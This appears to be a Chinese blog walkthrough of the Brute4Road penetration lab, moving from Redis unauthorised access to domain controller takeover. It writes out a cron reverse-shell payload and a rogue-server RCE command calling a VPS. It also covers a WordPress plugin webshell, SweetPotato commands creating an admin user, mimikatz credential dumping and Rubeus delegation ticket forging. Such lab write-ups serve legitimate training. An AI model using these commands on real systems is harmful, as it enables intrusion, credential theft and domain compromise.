从Redis未授权到域控:手把手复现Brute4Road靶场的完整内网渗透链路
松脂领花
从Redis未授权到域控:Brute4Road靶场全链路渗透实战解析
1. 靶场环境与攻击路径概览
Brute4Road靶场构建了一个典型的企业内网环境,包含五台关键主机:Redis服务器(172.22.2.7)、WordPress站点(172.22.2.18)、MSSQL数据库服务器(172.22.2.16)、未启用NLA的客户端(172.22.2.34)以及域控制器(172.22.2.3)。攻击链路设计为典型的"外网突破→内网横向→权限提升→域控接管"四阶段模型,每个阶段都设置了对应的flag作为里程碑。
关键路径节点:
- Redis未授权访问(Flag1)
- WordPress插件漏洞利用(Flag2)
- MSSQL提权与横向移动(Flag3)
- 约束委派攻击域控(Flag4)
实战提示:真实环境中建议使用虚拟专用网络进行隔离测试,避免直接暴露在公网
2. 初始突破:Redis未授权访问利用
Redis的6379端口暴露是本次渗透的起点。当发现未授权访问漏洞时,优先考虑以下攻击方式:
Redis利用矩阵:
| 利用方式 | 适用版本 | 风险等级 | 典型载荷 |
|---|---|---|---|
| 写SSH公钥 | <5.0.5 | 中 | config set dir /root/.ssh/ |
| 主从复制RCE | >=4.x | 高 | Redis模块注入 |
| 计划任务 | 全版本 | 高 | */1 * * * * bash -i >& /dev/tcp/IP/PORT |
| 写Webshell | 全版本 | 低 | config set dir /var/www/html |
本例使用主从复制RCE技术,通过redis-rogue-server工具实现命令执行:
python复制python3 redis-rogue-server.py --rhost 172.22.2.7 --lhost [VPS_IP] --port 21002
提权技巧:
- 发现base64具有SUID权限时,可绕过权限读取文件:
bash复制base64 "/home/redis/flag/flag01" | base64 --decode
3. 内网渗透基础建设
获得初始立足点后,需要建立稳定的通信渠道和内网侦查能力。
3.1 代理通道搭建
代理工具对比:
| 工具 | 类型 | 优势 | 劣势 | 典型配置 |
|---|---|---|---|---|
| frp | 反向代理 | 穿透性强 | 依赖外网服务器 | nohup ./frpc -c frpc.ini & |
| gost | 正向代理 | 配置简单 | 需端口映射 | ./gost -L=:10001 & |
| Neo-reGeorg | HTTP隧道 | 隐蔽性高 | 速度较慢 | python neoreg.py -k password |
操作注意:代理规则需精确配置目标网段(如172.22.2.*),避免流量泄露
3.2 内网侦查技术
使用fscan进行综合扫描时,关键参数解析:
bash复制./fscan -h 172.22.2.0/24 -p 21,22,80,445,1433,3306 -o result.txt
扫描结果关键指标:
- 存活主机:ICMP响应检测
- 端口服务:指纹识别(如Microsoft SQL Server 2016)
- 漏洞标记:如
[+]前缀的漏洞提示 - 域信息:NetBIOS名称解析(如DC.xiaorang.lab)
4. 横向移动:从Web到数据库
WordPress站点的WPCargo插件漏洞(CVE-2021-25003)成为突破口。该漏洞允许通过barcode.php文件实现未授权写入:
漏洞利用链:
- 构造特殊PNG载荷写入webshell
- 通过蚁剑等工具建立交互式会话
- 从wp-config.php获取数据库凭证
- 查询数据库获取Flag2及潜在密码
数据库操作关键命令:
sql复制SELECT * FROM wp_users WHERE user_login='admin';
UPDATE wp_options SET option_value='恶意代码' WHERE option_name='siteurl';
5. 权限提升与域渗透
5.1 MSSQL到SYSTEM提权
使用SweetPotato进行服务账户提权:
powershell复制SweetPotato.exe -a "net user hacker Password123! /add"
SweetPotato.exe -a "net localgroup administrators hacker /add"
提权技术对比:
| 技术 | 适用场景 | 成功率 | 检测难度 |
|---|---|---|---|
| 甜土豆 | IIS应用池账户 | 高 | 中等 |
| PrintSpoofer | SeImpersonate特权 | 极高 | 低 |
| JuicyPotato | 旧版Windows | 中 | 高 |
5.2 域环境信息收集
BloodHound三件套使用流程:
- 在目标机执行SharpHound收集数据:
powershell复制SharpHound.exe -c All -d xiaorang.lab
- 将生成的zip文件导入Neo4j数据库
- 使用BloodHound可视化分析攻击路径
关键攻击边识别:
- HasSession:用户登录会话
- AdminTo:管理员权限关系
- AllowedToDelegate:约束委派配置
- Owns:对象所有权关系
6. 终极目标:域控接管
通过约束委派漏洞,利用Rubeus工具完成攻击:
票据传递攻击步骤:
- 获取服务账户NTLM哈希:
powershell复制mimikatz.exe "sekurlsa::logonpasswords" "exit"
- 申请TGT票据:
powershell复制Rubeus.exe asktgt /user:MSSQLSERVER$ /rc4:[NTLM_HASH] /domain:xiaorang.lab
- S4U2Self伪造管理员票据:
powershell复制Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:CIFS/DC.xiaorang.lab /ptt /ticket:[BASE64_TICKET]
- 访问域控共享获取flag:
powershell复制type \\DC.xiaorang.lab\C$\Users\Administrator\flag\flag04.txt
在真实渗透测试项目中,每个阶段都应做好详细日志记录,包括:
- 执行的命令及返回结果
- 获取的凭证和敏感信息
- 网络拓扑和权限关系图
- 时间戳和操作人员标识
内容推荐
江协科技/江科大-STM32入门教程-1.初识STM32:核心架构、开发板与软件环境搭建
本文详细介绍了STM32的入门教程,包括核心架构解析、开发板实战指南及软件环境搭建。从STM32F103C8T6的基本参数到时钟树、DMA配置,再到Keil MDK安装和第一个LED闪烁程序,为初学者提供全面的嵌入式开发入门指导。
别再为GPU发愁了!手把手教你用Google Colab免费跑通Faster R-CNN(附防断线脚本)
本文详细介绍了如何利用Google Colab免费GPU资源高效运行Faster R-CNN模型,从环境配置到训练优化的全流程指南。特别针对Colab常见的断线问题,提供了多种实用的防断线脚本和保活技巧,帮助开发者克服算力限制,实现稳定的云端深度学习训练。
CVPR 2022 TransMVSNet保姆级解读:从PyTorch代码到你的第一个3D重建Demo
本文深入解析CVPR 2022提出的TransMVSNet模型,详细介绍如何从PyTorch代码实现到完整3D重建Demo的开发过程。该模型创新性地将Transformer架构引入多视图立体视觉(Multi-view Stereo)任务,通过特征匹配Transformer等核心模块显著提升重建精度。文章涵盖环境配置、数据准备、核心架构解析、训练策略及可视化部署全流程,是学习3D重建技术的实用指南。
安路FPGA IP核实战:从内部振荡器(OSC)到串口通信(UART)的完整开发流程
本文详细介绍了安路FPGA开发中IP核的应用实践,从内部振荡器(OSC)配置到串口通信(UART)实现的完整流程。通过具体代码示例和调试技巧,帮助开发者快速掌握安路FPGA的IP核使用方法,提升开发效率。重点讲解了OSC时钟分频、UART数据回环测试等关键技术点。
《AUTOSAR谱系分解(ETAS工具链)》之ComM配置实战:从参数解析到通道状态机控制
本文详细解析了AUTOSAR中ComM模块的配置实战,重点介绍了ETAS工具链下的参数设置与通道状态机控制。通过实际案例,帮助开发者避免常见配置错误,优化车载通信系统的性能与稳定性,提升开发效率。
AUTOSAR DEM 实战解析:DTC状态位与诊断事件的生命周期管理
本文深入解析AUTOSAR DEM模块中DTC状态位与诊断事件的生命周期管理,详细介绍了TestFailed、Pending、Confirmed等关键状态位的作用机制,以及诊断事件的触发、确认和老化清除流程。通过实战案例,帮助工程师掌握DTC状态位的存储策略和监控器联动设计,提升故障诊断的准确性和效率。
别再调库了!手把手教你用STM32F103寄存器直接配置移相全桥PWM(附完整代码)
本文详细介绍了如何使用STM32F103寄存器直接配置移相全桥PWM,从硬件原理到波形调试,提供完整的代码实现。通过寄存器级操作,开发者可以精确控制PWM波形,优化电源控制性能,适用于中高功率DCDC转换器设计。
virt-manager实战:从零部署高性能Ubuntu 22.04服务器虚拟机
本文详细介绍了使用virt-manager从零部署高性能Ubuntu 22.04服务器虚拟机的完整流程。涵盖环境准备、镜像选择、虚拟机创建、硬件配置、系统安装、性能优化等关键步骤,特别强调VirtIO驱动和NUMA配置对性能的提升作用,帮助用户快速搭建高效的服务器虚拟化环境。
工业自动化四大核心系统:从PLC到SCADA,如何选择与应用?
本文深入解析工业自动化四大核心系统(PLC、DCS、RTU、SCADA)的技术特点与应用场景,帮助读者根据控制规模、实时要求、环境条件和管理需求做出精准选型。通过实际案例对比硬件架构、软件生态和通讯协议差异,揭示PLC在离散制造、DCS在流程工业、RTU在远程监控以及SCADA在跨系统整合中的独特优势,并提供选型决策的黄金法则与成本计算要点。
从UI到代码:一份完整的Qt项目多语言(中/英)切换实战指南(含VS/Qt Creator)
本文提供了一份完整的Qt项目多语言(中/英)切换实战指南,涵盖从UI设计到代码集成的全流程。详细解析了Qt国际化核心组件如.ts文件和Qt Linguist的使用,并对比了Visual Studio和Qt Creator双环境下的配置差异。通过实际代码示例展示动态语言切换实现,包括QTranslator的使用和语言管理模块设计,帮助开发者高效实现多语言支持。
DIY电话拨号解码器:手把手教你用MT8870模块和MM32单片机搭建一个简易测试系统
本文详细介绍了如何利用MT8870解码模块和MM32F3277开发板搭建一个DIY电话拨号解码器系统。从硬件连接到软件编程,再到实际应用扩展,完整呈现了DTMF解码技术的实现过程。文章包含核心组件解析、硬件系统搭建指南、软件系统开发及高级调试技巧,适合电子爱好者和创客实践。
UnlockMusic实战:一键解密主流音乐平台加密格式,让音乐所有权回归用户
本文详细介绍了UnlockMusic工具如何一键解密主流音乐平台的加密格式(如.ncm、.qmc等),让用户真正拥有下载的音乐文件。通过本地化操作、多格式支持和持续更新,该工具帮助用户摆脱平台绑定,实现音乐自由播放。同时强调了合法使用的重要性,并提供了详细的使用教程和高级配置技巧。
OpenMV数字识别避坑指南:从模板匹配到特征点检测,我们踩过的那些坑
本文深入解析OpenMV数字识别实战中的技术选型与优化策略,对比模板匹配与特征点检测的优缺点,提供巡线算法和串口通信的工程化改进方案。通过实际案例展示如何在STM32平台上实现高效稳定的数字识别系统,涵盖算法调优、资源管理和实时性优化等关键技巧。
别再让测试用例顺序依赖坑了你!用pytest-random-order插件实现真正的随机测试
本文介绍了如何使用pytest-random-order插件解决测试用例顺序依赖问题,提升测试套件的健壮性。通过随机执行测试用例,暴露隐藏的依赖关系,并结合种子控制实现问题复现,帮助开发者构建真正独立的测试体系。
iOS App审核总被拒?可能是你的外接硬件没搞定MFi和PPID(附Honeywell Captuvo实战)
本文详细解析了iOS App因MFi配件未正确声明而被App Store拒绝的常见问题,特别是PPID配置的实战解决方案。通过Honeywell Captuvo扫描枪的案例,介绍了如何正确配置Info.plist、获取PPID以及与厂商沟通的技巧,帮助开发者顺利通过审核。
从GDAL到Cesium:使用CTB与Docker一站式生成地形切片
本文详细介绍了如何使用GDAL、Cesium Terrain Builder(CTB)和Docker一站式生成地形切片。从地形数据获取、Docker环境搭建到CTB实战应用,提供了完整的处理流程和优化建议,帮助开发者高效实现三维地形可视化。
别再死记硬背Hive DDL/DML/DQL了!用王者荣耀数据实战,5分钟搞定建表、分区与查询
本文通过王者荣耀英雄数据实战,详细讲解Hive的DDL、DML和DQL操作,包括建表、分区与查询技巧。从基础表设计到复杂数据类型应用,再到高效查询优化,帮助开发者快速掌握Hive核心功能,提升数据分析效率。
别再手算CRC了!用Python脚本自动生成Verilog并行CRC代码(附源码)
本文介绍了一种利用Python脚本自动生成Verilog并行CRC代码的方法,显著提升FPGA和ASIC设计效率。通过输入多项式参数,脚本可自动完成繁琐的矩阵运算和代码生成,解决传统手动推导中的维度爆炸、易出错等问题,适用于各种通信协议栈的CRC校验模块开发。
Python实战:基于gmssl模块的SM国密算法应用开发指南
本文详细介绍了如何使用Python的gmssl模块实现SM国密算法(SM2、SM3、SM4)的应用开发。从基础概念到实战示例,涵盖密钥管理、加密解密、数字签名等核心功能,帮助开发者快速掌握国密算法在数据安全领域的应用。文章还提供了性能优化和安全实践建议,适合需要符合国内密码标准的项目开发。
保姆级教程:在PVE 7.4上给Win10虚拟机开远程桌面,顺便搞定防火墙Ping不通
本文提供在PVE 7.4上为Win10虚拟机配置远程桌面的详细教程,涵盖镜像准备、虚拟机优化、远程桌面设置及防火墙调优等关键步骤。特别针对网络配置和ICMP协议问题提供解决方案,帮助用户快速实现高效远程访问。
已经到底了哦
精选内容
1 用Arduino UNO和SG90舵机做个会摇头的风扇,代码和接线都给你准备好了2 从源码到Wayland:Qt 5.12.2 嵌入式交叉编译实战指南3 从Android XML到Unity Shader:为手游UI实现圆角边框的跨平台方案对比4 STM32F030 ADC多通道采集数据老对不上?可能是DMA配置里这个细节没注意5 从零到一:Keil MDK-ARM实战入门与高效开发环境搭建指南6 揭秘GDG社区运营:一场千人开发者大会的‘保姆级’后勤与体验设计7 Android Shadow插件化实战:从零构建多插件宿主应用8 CVPR2023 ARTrack:自回归视觉跟踪的序列化建模与两阶段训练精解9 Stata实证研究提速:ivreghdfe安装与核心功能初体验(附简单IV回归案例)10 ROS多机通信实战:让两台Ubuntu电脑共享Realsense D435i的相机数据
热门内容
1 别再只会用串口打印了!手把手教你用0.96寸OLED给STM32项目做个实时调试屏2 AUTOSAR DEM模块实战:DTC快照(Snapshot)从配置到代码生成的完整流程3 基于STM32H743的FDCAN双通道配置与消息RAM优化实践4 SAP采购审批也能玩转低代码?手把手教你用‘灵活工作流’自定义PR审批规则5 Unity项目集成LitJSON:从零到一的配置与验证指南6 从OKR到MAS:我们团队如何用这套新方法搞定了季度目标对齐(附实战模板)7 从零到一:STM32标准库与HAL库工程创建实战解析8 告别ISE14.7!手把手教你将老FPGA工程迁移到Vivado(附UCF转XDC技巧)9 Flink Table API与SQL数据类型实战:从基础类型到复杂结构体的应用解析10 【UE5.3】从Live Link Face到MetaHuman Animator:实时表情捕捉与动画映射全流程解析
最新内容
从‘西气东输’到‘东数西算’:聊聊数学建模中的经典运输问题怎么变
本文探讨了从‘西气东输’到‘东数西算’背景下数学建模在资源分配问题中的演变。通过对比经典钢管运输与算力调度问题,分析了目标函数、约束条件和求解方法的革新,并介绍了混合整数非线性规划、强化学习动态调度等前沿方向,为新时代资源分配挑战提供建模思路。
Autoware路径规划避坑实录:从全局规划到控制指令下发的完整流程与常见错误排查
本文详细解析了Autoware路径规划从全局规划到控制指令下发的完整流程,重点解决全局路径规划、局部路径规划及控制指令下发中的常见问题。通过实战案例和参数优化建议,帮助开发者高效避坑,提升自动驾驶系统的稳定性和性能。
汽车电子 -- 从ASC文件解析到CAN总线数据回放
本文深入探讨了汽车电子开发中ASC文件解析与CAN总线数据回放的关键技术。从ASC文件结构解析、C语言实战操作技巧,到与BLF格式的深度对比及CANoe回放流程,全面介绍了汽车电子开发中的核心数据处理方法。通过实际案例和代码示例,帮助工程师高效处理CAN总线通信数据,提升汽车电子系统调试效率。
从BGT24LTR11到智能感知:24GHz毫米波雷达的实战开发指南
本文详细介绍了从BGT24LTR11芯片到智能感知系统的24GHz毫米波雷达实战开发指南。涵盖硬件设计、FMCW信号生成、数据采集及信号处理算法,帮助开发者快速掌握毫米波雷达技术,并应用于智能路灯控制、区域安防等场景。
OpenAPI 3.0 注解实战:从零构建清晰API文档
本文详细介绍了如何使用OpenAPI 3.0注解从零构建清晰的API文档,解决传统文档维护的痛点。通过Spring Boot项目实战,展示了核心注解如@Schema、@Operation的应用技巧,以及接口分组、组件复用等高级实践,帮助开发者实现代码即文档的目标。
Spring Cloud Gateway聚合Swagger3:构建安全可控的微服务API文档门户
本文详细介绍了如何使用Spring Cloud Gateway聚合Swagger3,构建安全可控的微服务API文档门户。通过网关聚合,开发者可以在一个页面查看所有微服务的接口,统一管理文档访问权限,并避免暴露内部服务地址。文章还涵盖了基础认证、OAuth2集成、文档缓存策略和权限分级等高级优化技巧,帮助企业在生产环境中实现高效、安全的API文档管理。
OpenHarmony L0设备XTS认证实战:从编译到问题排查的完整指南
本文详细解析OpenHarmony L0设备XTS认证的全流程,从编译环境搭建到常见问题排查,提供实战经验与解决方案。重点介绍硬件适配层改造、子系统裁剪技巧,以及Wi-Fi测试、KV存储超时等典型问题的处理方法,助力开发者高效完成设备认证。
随身WiFi变身低功耗NAS:OpenWrt刷机后的存储与下载中心搭建实录
本文详细介绍了如何将随身WiFi刷入OpenWrt系统后改造为低功耗NAS,实现存储与下载功能。通过USB接口外接存储设备,配合qBittorrent或Aria2等下载工具,搭建成本低廉且节能的轻量级存储中心,特别适合对电费敏感的用户。文章涵盖硬件选择、刷机步骤、存储配置及下载优化等全流程实战指南。
LeGO-LOAM地面分离与聚类优化:从BFS图搜索到两步优化的工程实践
本文深入解析LeGO-LOAM算法中地面点分离与聚类的优化方法,详细介绍了基于角度阈值的地面点提取算法和BFS图搜索的聚类技术。通过两步优化里程计的技术实现,提升定位精度,适用于复杂室外环境。文章还分享了工程实践中的参数调优经验和典型场景的配置建议,帮助开发者更好地应用LeGO-LOAM算法。
当联合注入和报错注入都失效时:我是如何用时间盲注‘磨’出数据库名的
本文详细介绍了在联合注入和报错注入失效时,如何利用时间盲注技术逐步获取数据库名。通过分析时间盲注的基本原理、验证方法和实战技巧,作者分享了优化请求策略和编写自动化脚本的经验,为渗透测试提供了宝贵参考。